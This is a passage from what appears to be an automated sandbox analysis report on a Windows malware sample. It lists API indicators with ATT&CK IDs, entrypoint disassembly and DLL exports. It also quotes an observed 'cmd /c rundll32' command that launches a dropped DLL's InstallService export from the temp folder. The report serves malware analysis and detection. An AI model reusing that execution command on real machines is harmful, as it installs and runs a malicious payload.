00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"InternetConnectA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"SizeofResource\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"LockResource\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadResource\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindResourceA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"WinExec\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateFileMappingA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenMutexA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegEnumValueA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetMessageA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API (Indicator: \"CoCreateInstance\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CLSIDFromString\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoInitializeEx\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoUninitialize\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapSetInformation\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"QueryActCtxW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateFileW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LocalFree\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LocalAlloc\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"lstrlenW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateProcessW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"Wow64EnableWow64FsRedirection\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetNativeSystemInfo\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"IsWow64Process\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetProcessDEPPolicy\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"FormatMessageW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryExW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetErrorMode\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"DelayLoadFailureHook\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InterlockedCompareExchange\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryExA\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetSearchPathMode\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SearchPathW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateActCtxW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"ActivateActCtx\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"DeactivateActCtx\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"ReleaseActCtx\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CompareStringW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InterlockedExchange\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"DefWindowProcW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CharNextW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadStringW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"DestroyWindow\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"MessageBoxW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadIconW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadCursorW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RegisterClassW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateWindowExW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindow\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlImageNtHeader\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"NtOpenProcessToken\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"NtClose\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"NtQueryInformationToken\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"NtSetInformationProcess\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"PathIsRelativeW\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API \"NtOpenProcessToken\" (Indicator: \"OpenProcess\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"908501218x27.dll\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"x27x.dll\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" file has an entrypoint instructions - \"sub\tesp, 0xd38,push\tebx,push\tebp,push\tesi,mov\tesi, dword ptr [0x40208c],push\tedi,push\t0xbb8,call\tesi,push\t0,push\t0x4014c0,call\tdword ptr [0x4020c4],push\t0x7d0,call\tesi,mov\tecx, 0x100,xor\teax, eax,lea\tedi, [esp + 0x44],rep stosd\tdword ptr es:[edi], eax,mov\tecx, 0x100,lea\tedi, [esp + 0x444],rep stosd\tdword ptr es:[edi], eax,lea\teax, [esp + 0x444],push\teax,push\t0x403170,push\t0x403144,push\t0x80000000,call\t0x4013e0,\"\n \"908501218x27.dll\" file has an entrypoint instructions - \"mov\teax, dword ptr [esp + 8],dec\teax,jne\t0x10004865,mov\teax, dword ptr [esp + 4],mov\tdword ptr [0x10009a48], eax,call\t0x10004680,mov\teax, 1,ret\t0xc,nop\t,nop\t,nop\t,jmp\tdword ptr [0x10005054],jmp\tdword ptr [0x10005058],jmp\tdword ptr [0x1000505c],jmp\tdword ptr [0x100051b0],jmp\tdword ptr [0x100051ac],jmp\tdword ptr [0x100051a8],jmp\tdword ptr [0x100051a4],jmp\tdword ptr [0x100051a0],jmp\tdword ptr [0x1000519c],jmp\tdword ptr [0x10005198],jmp\tdword ptr [0x10005194],\"\n \"x27x.dll\" file has an entrypoint instructions - \"mov\teax, dword ptr [esp + 8],dec\teax,jne\t0x10004865,mov\teax, dword ptr [esp + 4],mov\tdword ptr [0x10009a48], eax,call\t0x10004680,mov\teax, 1,ret\t0xc,nop\t,nop\t,nop\t,jmp\tdword ptr [0x10005054],jmp\tdword ptr [0x10005058],jmp\tdword ptr [0x1000505c],jmp\tdword ptr [0x100051b0],jmp\tdword ptr [0x100051ac],jmp\tdword ptr [0x100051a8],jmp\tdword ptr [0x100051a4],jmp\tdword ptr [0x100051a0],jmp\tdword ptr [0x1000519c],jmp\tdword ptr [0x10005198],jmp\tdword ptr [0x10005194],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-78", "relevance": 1, "name": "Contains export functions", "description": "\"908501218x27.dll\" contains export function called \"InstallService\" at ordinal 5\n \"908501218x27.dll\" contains export function called \"KsCreateAllocator\" at ordinal 1\n \"908501218x27.dll\" contains export function called \"KsCreateClock\" at ordinal 2\n \"908501218x27.dll\" contains export function called \"KsCreatePin\" at ordinal 3\n \"908501218x27.dll\" contains export function called \"KsCreateTopologyNode\" at ordinal 4\n \"908501218x27.dll\" contains export function called \"wwhkf\" at ordinal 6\n \"908501218x27.dll\" contains export function called \"wwhko\" at ordinal 7\n \"x27x.dll\" contains export function called \"InstallService\" at ordinal 5\n \"x27x.dll\" contains export function called \"KsCreateAllocator\" at ordinal 1\n \"x27x.dll\" contains export function called \"KsCreateClock\" at ordinal 2\n \"x27x.dll\" contains export function called \"KsCreatePin\" at ordinal 3\n \"x27x.dll\" contains export function called \"KsCreateTopologyNode\" at ordinal 4\n \"x27x.dll\" contains export function called \"wwhkf\" at ordinal 6\n \"x27x.dll\" contains export function called \"wwhko\" at ordinal 7", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-170", "type": 2, "relevance": 1, "name": "Possibly uses system binaries (Windows LOLbins)", "description": "Observed system executable string:\"cmd /c %WINDIR%\\system32\\rundll32.exe %TEMP%\\x27x.dll,InstallService C:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" [Source: 00000000-00004528-00000C43-4970973906]\n Observed system executable string:\"%WINDIR%\\system32\\rundll32.exe\" [Source: 00000000-00004920-00000C60-1184635918]", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f46d77@RPCRT4.dll\"\n \"15001600c03e876b@ADVAPI32.dll\"\n \"0e000f00703f876b@ADVAPI32.dll\"\n \"0e000f00cc3f876b@ADVAPI32.dll\"\n \"11001200b447876b@ADVAPI32.dll\"\n \"110012004848876b@ADVAPI32.dll\"\n \"120013008c48876b@ADVAPI32.dll\"\n \"12001300e448876b@ADVAPI32.dll\"\n \"14001500386e876b@ADVAPI32.dll\"\n \"14001500506e876b@ADVAPI32.dll\"\n \"14001500686e876b@ADVAPI32.dll\"\n \"17001800806e876b@ADVAPI32.dll\"\n \"0d000e00986e876b@ADVAPI32.dll\"\n \"11001200a86e876b@ADVAPI32.dll\"\n \"11001200bc6e876b@ADVAPI32.dll\"\n \"0f001000fc6f876b@ADVAPI32.dll\"\n \"140015003c70876b@ADVAPI32.dll\"\n \"140015005470876b@ADVAPI32.dll\"\n \"0c000d009c70876b@ADVAPI32.dll\"\n \"0c000d00ac70876b@ADVAPI32.dll\"\n \"0e000f00bc70876b@ADVAPI32.dll\"\n \"0e000f00cc70876b@ADVAPI32.dll\"\n \"0b000c00dc70876b@ADVAPI32.dll\"\n \"180019001473876b@RPCRT4.dll\"\n \"130014004073876b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"cmd /c %WINDIR%\\system32\\rundll32.exe %TEMP%\\x27x.dll,InstallService C:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" [Source: 00000000-00004528-00000C43-4970973906]\n Observed system executable string:\"%WINDIR%\\system32\\apphelp.dll\" [Source: 00000000-00004936-0000018F-214610]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00004920-00000C28-1184639020]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called 